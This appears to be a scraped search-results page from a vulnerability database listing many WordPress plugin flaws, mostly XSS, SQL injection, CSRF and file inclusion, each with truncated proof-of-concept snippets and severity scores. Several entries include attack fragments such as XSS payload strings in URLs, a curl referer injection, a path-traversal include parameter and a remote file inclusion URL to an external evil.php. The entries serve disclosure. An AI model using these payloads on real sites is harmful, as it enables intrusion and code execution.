Lucene search
K
WpexploitMost viewed

4359 matches found

wpexploit
wpexploit
added 2023/01/23 12:0 a.m.539 views

WP Review Slider < 12.2 - Subscriber+ SQLi

The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by users with a role as low as subscriber. Run the following code in the browser console on any WP Admin page. fetch'/wp-admin/admin-ajax.php', method: 'POST',...

8.8CVSS9.2AI score0.00919EPSS
Exploits2
wpexploit
wpexploit
added 2021/09/28 12:0 a.m.539 views

WP Reactions Lite < 1.3.6 - Authenticated Stored Cross Site Scripting

The plugin does not properly sanitize inputs within wp-admin pages, allowing users with sufficient access to inject XSS payloads within /wp-admin/ pages. Open Global Activation and Click on Customize Now On Step3 StylingTab Enter the XSS payload into "Whats your reaction" field Payload Used :...

5.4CVSS5.3AI score0.00629EPSS
Exploits2
wpexploit
wpexploit
added 2021/08/09 12:0 a.m.539 views

Stop Spammers Security < 2021.18 - Authenticated Stored XSS

The plugin does not escape some of its settings, allowing high privilege users such as admin to set Cross-Site Scripting payloads in them even when the unfilteredhtml capability is disallowed Put the following payload in any of the API field of the Web Services settings: " autofocus...

5.4CVSS0.5AI score0.00624EPSS
Exploits2
wpexploit
wpexploit
added 2021/03/11 12:0 a.m.539 views

JH 404 Logger <= 1.1 - Unauthenticated Stored Cross-Site Scripting (XSS)

The plugin doesn't sanitise the referer and path of 404 pages, when they are output in the dashboard, which leads to executing arbitrary JavaScript code in the WordPress dashboard. curl 'https://example.com/non-existing-page"' -e '"'...

3.5CVSS1AI score0.02044EPSS
Exploits2
wpexploit
wpexploit
added 2023/01/31 12:0 a.m.538 views

GeoDirectory < 2.2.24 - Admin+ SQLi

The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admin. POST /wp-admin/admin-ajax.php HTTP/1.1...

7.2CVSS7.9AI score0.00764EPSS
Exploits1References1
wpexploit
wpexploit
added 2021/09/07 12:0 a.m.538 views

Weather Effect < 1.3.6 - Admin+ Stored Cross-Site Scripting

The plugin does not properly validate and escape some of its settings like sizeleaf, flakesleaf, speed which could lead to Stored Cross-Site Scripting issues POST /wp-admin/admin.php?page=weather-effects-setting HTTP/1.1 Accept: text/html, /; q=0.01 Accept-Language: en-GB,en;q=0.5 Accept-Encoding...

4.8CVSS0.4AI score0.00598EPSS
Exploits2
wpexploit
wpexploit
added 2021/08/30 12:0 a.m.538 views

Docket Cache < 21.08.02 - Reflected Cross-Site Scripting

The plugin does not escape some filter parameters when the OPCache Viewer is enabled before outputting them back in attributes, leading to Reflected Cross-Site Scripting issues https://example.com/wp-admin/admin.php?page=docket-cache-opcviewer&idx=opcviewer&s=a&sf="alert/XSS-sf/&sm="alert/XSS-sm/...

0.9AI score
Exploits0
wpexploit
wpexploit
added 2021/06/07 12:0 a.m.538 views

Stripe Payment Gateway for WooCommerce < 3.6.0 - Reflected Cross-Site Scripting (XSS)

The plugin did not sanitise or escape the page parameter before outputting back in an attribute, leading to a reflected Cross-Site Scripting issue alert/XSS/"' /...

6.5AI score
Exploits0References1
wpexploit
wpexploit
added 2021/04/17 12:0 a.m.538 views

WordPress Download Manager < 3.1.18 - Unauthorised Download Duplication

The duplicate method, hooked to the admininit action did not have any CSRF and authorisation checks, allowing unauthorised users such as unauthenticated ones to duplicate arbitrary downloads As an unauthenticated or authenticated user, open the following URL to duplicate the Download with id 717...

1AI score
Exploits0References1
wpexploit
wpexploit
added 2022/10/03 12:0 a.m.537 views

Blog2Social < 6.9.10 - Subscriber+ SQLi

The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by any authenticated users, such as subscribers Run the script below in the web browser console while being logged in as a subscriber and on the Blog2Social...

8.8CVSS0.5AI score0.01049EPSS
Exploits2
wpexploit
wpexploit
added 2021/10/11 12:0 a.m.537 views

Print-O-Matic < 2.0.3 - Admin+ Stored Cross-Site Scripting

The plugin does not escape some of its settings before outputting them in attribute, which could allow high privilege users to perform Cross-Site Scripting attacks even when the unfilteredhtml capability is disallowed. Put the following payload in the "Pause Before Print" settings of the plugin: ...

4.8CVSS0.5AI score0.00654EPSS
Exploits2References1
wpexploit
wpexploit
added 2021/10/11 12:0 a.m.537 views

WP Header Images < 2.0.1 - Reflected Cross-Site Scripting

The plugin does not sanitise and escape the t parameter before outputting it back in the plugin's settings page, leading to a Reflected Cross-Site Scripting issue https://example.com/wp-admin/options-general.php?page=wphi&t=5"alert/XSS/...

6.1CVSS0.4AI score0.008EPSS
Exploits2
wpexploit
wpexploit
added 2021/09/20 12:0 a.m.537 views

Sociable <= 4.3.4.1 - Admin+ Stored Cross-Site Scripting

The plugin does not sanitise or escape some of its settings before outputting them in the admins dashboard, allowing high privilege users to perform Cross-Site Scripting attacks against other users even when the unfilteredhtml capability is disallowed Put the following payload in the "Background...

4.8CVSS4.8AI score0.00622EPSS
Exploits2
wpexploit
wpexploit
added 2021/09/20 12:0 a.m.537 views

YITH WooCommerce Product Add-Ons < 2.1.0 - Authenticated Local File Inclusion

The plugin does not validate user input before using it to generate a local path passed to include, which could lead to a Local File Inclusion issue on Windows Web Servers https://example.com/wp-admin/admin.php?page=yithwapopanel&tab=blocks&blockid=1&addonid=1&addontype=html%2F..%2Fhello...

2.6AI score
Exploits0
wpexploit
wpexploit
added 2021/06/21 12:0 a.m.537 views

Prismatic < 2.8 - Reflected Cross-Site Scripting (XSS)

The plugin does not escape the 'tab' GET parameter before outputting it back in an attribute, leading to a reflected Cross-Site Scripting issue which will be executed in the context of a logged in administrator...

6.1CVSS1.1AI score0.01793EPSS
Exploits2
wpexploit
wpexploit
added 2021/10/18 12:0 a.m.536 views

Insert Pages < 3.7.0 - Contributor+ Stored Cross-Site Scripting

The plugin adds a shortcode that prints out other pages' content and custom fields. It can be used by users with a role as low as Contributor to perform Cross-Site Scripting attacks by storing the payload/s in another post's custom fields. - Create a page A - Add a custom field containing JS in...

5.4CVSS1.2AI score0.00604EPSS
Exploits2
wpexploit
wpexploit
added 2021/10/11 12:0 a.m.536 views

Storefront Footer Text <= 1.0.1 - Admin+ Stored Cross-Site Scripting

The plugin does not sanitize and escape the "Footer Credit Text" added to pages, allowing high privilege users to perform Cross-Site Scripting attacks even when the unfiltered-html capability is disallowed. The plugin requires the Storefront theme Go to Appearance Customize /wp-admin/customize.ph...

4.8CVSS0.00598EPSS
Exploits2
wpexploit
wpexploit
added 2021/09/20 12:0 a.m.536 views

YITH WooCommerce Product Add-Ons < 2.1.0 - Reflected Cross-Site Scripting

The plugin does not escape some parameters before outputting them back in the edit addon page in the admin dashboard, leading to Reflected Cross-Site Scripting issues v alert/XSS-id/&addontype=html"alert/XSS-type/ v 2.1.0...

0.3AI score
Exploits0
wpexploit
wpexploit
added 2021/09/06 12:0 a.m.536 views

UsersWP < 1.2.2.29 - Reflected Cross-Site Scripting

The plugin sanitises user input via sanitizetextfield but do not escape it before outputting it back in attributes, leading to Reflected Cross-Site Scripting issues On the reset page made by the plugin: https://example.com/reset/?key=a&login=%22accesskey=X%20onclick=alert1%20b=%22...

0.7AI score
Exploits0
wpexploit
wpexploit
added 2021/05/04 12:0 a.m.536 views

WP Customer Reviews < 3.5.6 - Authenticated Stored Cross-Site Scripting (XSS)

The plugin did not sanitise some of its settings, allowing high privilege users such as administrators to set XSS payloads in them which will then be triggered in pages where reviews are enabled 1. Login to WordPress as an Administrator 2. Install and Activate plugin "WP Customer Reviews" 3. Clic...

4.8CVSS0.1AI score0.00617EPSS
Exploits2References1
wpexploit
wpexploit
added 2021/03/15 12:0 a.m.536 views

Related Posts for WordPress < 2.0.4 - Authenticated Reflected Cross-Site Scripting (XSS)

Unvalidated input and lack of output encoding within the plugin lead to a Reflected Cross-Site Scripting XSS vulnerability within the 'lang' GET parameter while editing a post, triggered when users with the capability of editing posts access a malicious URL...

3.5CVSS0.5AI score0.00632EPSS
Exploits2
wpexploit
wpexploit
added 2020/09/06 12:0 a.m.536 views

Constant Contact Forms < 1.8.8 - Multiple Authenticated Stored XSS

Multiple stored cross-site scripting vulnerabilities in Constant Contact Forms for WordPress 1.8.7 and lower allow high-privileged user Editor+ to inject arbitrary Javascript code or HTML in posts where the malicious form is embed. High-privileged user Editor+ can exploit XSS via Add New Form's...

5.3AI score0.00654EPSS
Exploits2References1
wpexploit
wpexploit
added 2022/03/21 12:0 a.m.535 views

Salon booking system < 7.6.3 - Customer+ Bookings/Customers Data Disclosure

The plugin does not have proper authorisation in some of its endpoints, which could allow customers to access all bookings and other customer's data Make a booking to get a customer account Login via API and get access token: curl...

7.5CVSS1.2AI score0.01431EPSS
Exploits2
wpexploit
wpexploit
added 2021/12/05 12:0 a.m.535 views

WP Coder < 2.5.2 - RFI leading to RCE via CSRF

The plugin within the wow-company admin menu page allows to include arbitrary file with PHP extension as well as with data:// or http:// protocols, thus leading to CSRF RCE. http://127.0.0.1:8001/wp-admin/admin.php?page=wow-company&tab=https%3A%2F%2Fstatic.kazet.cc%2Fevil.php%3F PHP's...

8.8CVSS1.3AI score0.0067EPSS
Exploits2References1
wpexploit
wpexploit
added 2021/10/04 12:0 a.m.535 views

Events Made Easy < 2.2.24 - Admin+ Stored Cross-Site Scripting

The plugin does not sanitise and escape Custom Field Names, allowing high privilege users to perform Cross-Site Scripting attacks even when the unfilteredhtml capability is disallowed Add/Edit a Custom Field /wp-admin/admin.php?page=eme-formfields and put the following payload in the Field Name:...

4.8CVSS0.1AI score0.00681EPSS
Exploits2References1
wpexploit
wpexploit
added 2021/09/20 12:0 a.m.535 views

StreamCast < 2.1.1 - Contributor+ Stored Cross-Site Scripting

The plugin does not sanitise or validate the parameters from its shortcode, allowing users with a role as low as contributor to set Cross-Site Scripting payload in them which will be triggered in the page/s with the embed malicious shortcode Log in as contributor and add the following shortcode i...

5.4CVSS0.5AI score0.00562EPSS
Exploits1
wpexploit
wpexploit
added 2021/09/13 12:0 a.m.536 views

Affiliate Power < 2.3.0 - Reflected Cross-Site Scripting

The plugin does not escape the page parameter in its Affiliate Power Sales dashboard before outputting it back in an attribute, leading to a Reflected Cross-Site Scripting issue alert/XSS/' /...

0.2AI score
Exploits0
wpexploit
wpexploit
added 2021/09/10 12:0 a.m.535 views

Easy Accordion < 2.0.22 - Authenticated Stored XSS

The plugin does not properly sanitize inputs when adding new items to an accordion. When adding new items to an accordion, an injection payload of "" for an accordion item's title will result in XSS in the wp-admin page as well as on pages that show the accordion...

5.4CVSS1.4AI score0.00604EPSS
Exploits2
wpexploit
wpexploit
added 2021/08/09 12:0 a.m.535 views

Tutor LMS < 1.9.6 - Reflected Cross-Site Scripting

The plugin does not escape a page parameter before outputting it back in an student dashboard page, leading to a Reflected Cross-Site Scripting issue alert/XSS/' /...

0.1AI score
Exploits0
wpexploit
wpexploit
added 2021/04/11 12:0 a.m.535 views

Business Directory Plugin < 5.11 - Arbitrary File Upload to RCE

The plugin suffered from a Cross-Site Request Forgery issue, allowing an attacker to make a logged in administrator import files. As the plugin also did not validate uploaded files, it could lead to RCE. Note WPScanTeam: CSRF check and some file validation were added in v5.11, however a blacklist...

6.8CVSS8.8AI score0.00672EPSS
Exploits2
wpexploit
wpexploit
added 2022/11/21 12:0 a.m.534 views

User Registration < 2.2.4.1 - Subscriber+ Arbitrary File Upload

The plugin does not properly restrict the files to be uploaded via an AJAX action available to both unauthenticated and authenticated users, which could allow unauthenticated users to upload PHP files for example. The following Python script automates the exploitation of this plugin by uploading ...

7.5CVSS0.6AI score0.00743EPSS
Exploits2
wpexploit
wpexploit
added 2022/08/29 12:0 a.m.534 views

Form Builder CP < 1.2.32 - Admin+ Stored Cross-Site Scripting

The plugin does not sanitise and escape some of its form settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfilteredhtml capability is disallowed for example in multisite setup Create/edit a form and put the following...

4.8CVSS0.1AI score0.005EPSS
Exploits2
wpexploit
wpexploit
added 2021/10/05 12:0 a.m.534 views

Simple Download Monitor < 3.9.5 - Contributor+ Stored Cross-Site Scripting via File Thumbnail

The plugin does not escape the "File Thumbnail" post meta before outputting it in some pages, which could allow users with a role as low as Contributor to perform Stored Cross-Site Scripting attacks. Given the that XSS is triggered even when the Download is in a review state, contributor could ma...

9CVSS0.01241EPSS
Exploits2
wpexploit
wpexploit
added 2021/09/21 12:0 a.m.533 views

Game Server Status <= 1.0 - Admin+ Stored Cross-Site Scripting

The plugin does not escape some of the Game Server data, which could allow high privilege users such as admin to perform Cross-Site Scripting even when the unfiletredhtml is disallowed Create/Edit a Game Server and add the following payload as Server name: Test"alert/XSS/...

1AI score
Exploits0
wpexploit
wpexploit
added 2021/08/24 12:0 a.m.533 views

Live Scores for SportsPress < 1.9.1 - Authenticated Local File Inclusion

The plugin does not validate or sanitise the tab parameter in the admin dashboard before using it in an include statement, leading to an Authenticated Local File Inclusion https://example.com/wp-admin/admin.php?page=live-scores-for-sportspress&tab=../../index This will include the homepage of the...

0.6AI score
Exploits0
wpexploit
wpexploit
added 2021/07/26 12:0 a.m.533 views

Qyrr < 0.7 - Authenticated (contributor+) Stored XSS

The plugin does not escape the data-uri of the QR Code when outputting it in a src attribute, allowing for Cross-Site Scripting attacks. Furthermore, the datauritometa AJAX action, available to all authenticated users, only had a CSRF check in place, with the nonce available to users with a role ...

5.5AI score0.00218EPSS
Exploits2
wpexploit
wpexploit
added 2020/07/03 12:0 a.m.533 views

Testimonials Widget < 4.0.0 - Multiple Authenticated Stored XSS

Multiple cross-site scripting vulnerabilities in Testimonials Widget 3.5.1 and lower allow remote attackers to inject arbitrary Javascript code or HTML via the below parameters: - Author - Job Title - Location - Company - Email - URL Successful exploitation of this vulnerability would allow...

5.6AI score0.00822EPSS
Exploits2
wpexploit
wpexploit
added 2021/08/23 12:0 a.m.532 views

Timetable and Event Schedule by MotoPress < 2.3.19 - Author+ Stored Cross-Site Scripting

The plugin does not sanitise some of its parameters, which could allow low privilege users such as author to perform XSS attacks against frontend and backend users when viewing the related event/s Create an event with the following payload in the description of a timeslot: The XSS will be execute...

5.4CVSS1AI score0.0086EPSS
Exploits2References2
wpexploit
wpexploit
added 2023/01/19 12:0 a.m.531 views

Mapwiz <= 1.0.1 - Admin+ SQLi

The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admin. POST /wp-admin/admin.php?page=myplug/muyplg.php&mid HTTP/1.1...

7.2CVSS7.6AI score0.00957EPSS
Exploits2References1
wpexploit
wpexploit
added 2022/09/20 12:0 a.m.531 views

Search Logger <= 0.9 - Admin+ SQLi

The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users ------------------------------------------------- Go to Search Logger Logs Select Delete ------------------------------------------------...

7.2CVSS0.7AI score0.00921EPSS
Exploits2
wpexploit
wpexploit
added 2021/10/05 12:0 a.m.531 views

Simple Download Monitor < 3.9.6 - Arbitrary Thumbnails Removal

The plugin allows users with a role as low as Contributor to remove thumbnails from downloads they do not own, even if they cannot normally edit the download. jQuery.postajaxurl, action: "sdmremovethumbnailimage", postiddel: 613 // not owned by the user POST /wp-admin/admin-ajax.php HTTP/1.1...

4.3CVSS0.4AI score0.00654EPSS
Exploits2
wpexploit
wpexploit
added 2021/08/02 12:0 a.m.531 views

Sitewide Notice WP < 2.3 - Authenticated Stored XSS

The plugin does not sanitise some of its settings before outputting them in frontend pages, allowing high privilege users to perform Cross-Site Scripting attacks even when the unfilteredhtml capability is disallowed Put the following payload in the Message setting of the plugin: alert/XSS/ The XS...

4.8CVSS4.8AI score0.00617EPSS
Exploits2
wpexploit
wpexploit
added 2021/05/16 12:0 a.m.531 views

Database Backup for WordPress < 2.4 - Authenticated Persistent Cross-Site Scripting (XSS)

The plugin did not escape the backuprecipient POST parameter in before output it back in the attribute of an HTML tag, leading to a Stored Cross-Site Scripting issue. POST /wp-admin/tools.php?page=wp-db-backup HTTP/1.1 Host: example.com User-Agent: Mozilla/5.0 Content-Type:...

5.4CVSS0.3AI score0.00703EPSS
Exploits2References1
wpexploit
wpexploit
added 2022/12/27 12:0 a.m.530 views

Sassy Social Share < 3.3.45 - Contributor+ Stored XSS

The plugin does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins. Insert the...

5.4CVSS0.7AI score0.00471EPSS
Exploits2
wpexploit
wpexploit
added 2023/02/28 12:0 a.m.529 views

OAuth Single Sign On - SSO (OAuth Client) < 6.24.2 - IdP Discard via CSRF

The plugin does not have CSRF checks when discarding Identify providers IdP, which could allow attackers to make logged in admins delete all IdP via a CSRF attack Make a logged in admin open: https://example.com/wp-admin/admin.php?page=mooauthsettings&tab=config&action=discard...

6.5CVSS6.3AI score0.00326EPSS
Exploits2
wpexploit
wpexploit
added 2021/10/04 12:0 a.m.529 views

BP Better Messages < 1.9.9.41 - Multiple CSRF

The plugin does not check for CSRF in multiple of its AJAX actions: bpbettermessagesleavechat, bpbettermessagesjoinchat, bpmessagesleavethread, bpmessagesmutethread, bpmessagesunmutethread, bpbettermessagesaddusertothread, bpbettermessagesexcludeuserfromthread. This could allow attackers to make...

8.8CVSS1AI score0.00703EPSS
Exploits2References1
wpexploit
wpexploit
added 2021/09/27 12:0 a.m.529 views

WP Table Builder < 1.3.10 - Reflected Cross-Site Scripting

The plugin does not escape a page parameter before outputting it back in an admin dashboard page, leading to a Reflected Cross-Site Scripting issue alert/XSS/' /...

0.2AI score
Exploits0
wpexploit
wpexploit
added 2021/09/20 12:0 a.m.529 views

Gutenberg PDF Viewer Block < 1.0.1 - Contributor+ Stored Cross-Site Scripting

The plugin does not sanitise and escape its block, which could allow users with a role as low as Contributor to perform Cross-Site Scripting attacks...

5.4CVSS0.00629EPSS
Exploits2
wpexploit
wpexploit
added 2024/01/11 12:0 a.m.528 views

POST SMTP Mailer < 2.8.8 - Authorization Bypass via type connect-app API

Description The plugin is vulnerable to unauthorized access of data and modification of data due to a type juggling issue on the connect-app REST endpoint in all versions up to, and including, 2.8.7. This makes it possible for unauthenticated attackers to reset the API key used to authenticate to...

9.8CVSS9.6AI score0.90339EPSS
Exploits6References1
wpexploit
wpexploit
added 2021/11/01 12:0 a.m.528 views

My Calendar < 3.2.18 - Subscriber+ Reflected Cross-Site Scripting

The plugin does not sanitise and escape the callback parameter of the mcpostlookup AJAX action available to any authenticated user before outputting it back in the response, leading to a Reflected Cross-Site Scripting issue...

5.4CVSS5.3AI score0.006EPSS
Exploits2
Total number of security vulnerabilities4359